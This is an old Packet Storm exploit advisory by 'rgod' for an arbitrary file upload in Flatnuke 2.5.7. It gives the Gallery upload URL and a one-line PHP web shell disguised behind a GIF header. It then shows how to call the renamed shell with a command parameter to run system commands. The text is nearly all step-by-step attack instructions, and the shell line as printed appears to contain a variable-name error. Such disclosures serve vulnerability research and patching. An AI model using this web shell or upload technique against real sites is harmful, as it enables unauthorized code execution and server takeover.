flatnuke-2.5.7_xpl.txt

2006-07-14T00:00:00
ID PACKETSTORM:48251
Type packetstorm
Reporter rgod
Modified 2006-07-14T00:00:00

Description

                                        
                                            `12/07/200619.11.54  
----- Flatnuke 2.5.7 arbitrary file upload / remote code execution -------------  
software:  
site: http://www.flatnuke.org/  
--------------------------------------------------------------------------------  
  
if user Gallery uploads are enabled (not the default) you can go to:  
  
http://[target]/[path_to_flatnuke]/index.php?mod=Gallery  
  
to upload a shell.php file, ex:  
  
GIF86<?php system($GET[cmd]);?>  
  
file is renamed like this:  
  
shell_by_[username].php  
  
now you can launch commands, ex:  
  
http://[target]/[path]/sections/Gallery/shell_by_rgod.php?cmd=ls%20-la  
  
--------------------------------------------------------------------------------  
rgod  
site: http://rgod.altervista.org  
mail: rgod @ autistici.org  
--------------------------------------------------------------------------------  
  
original url: http://retrogod.altervista.org/flatnuke257_adv.html  
`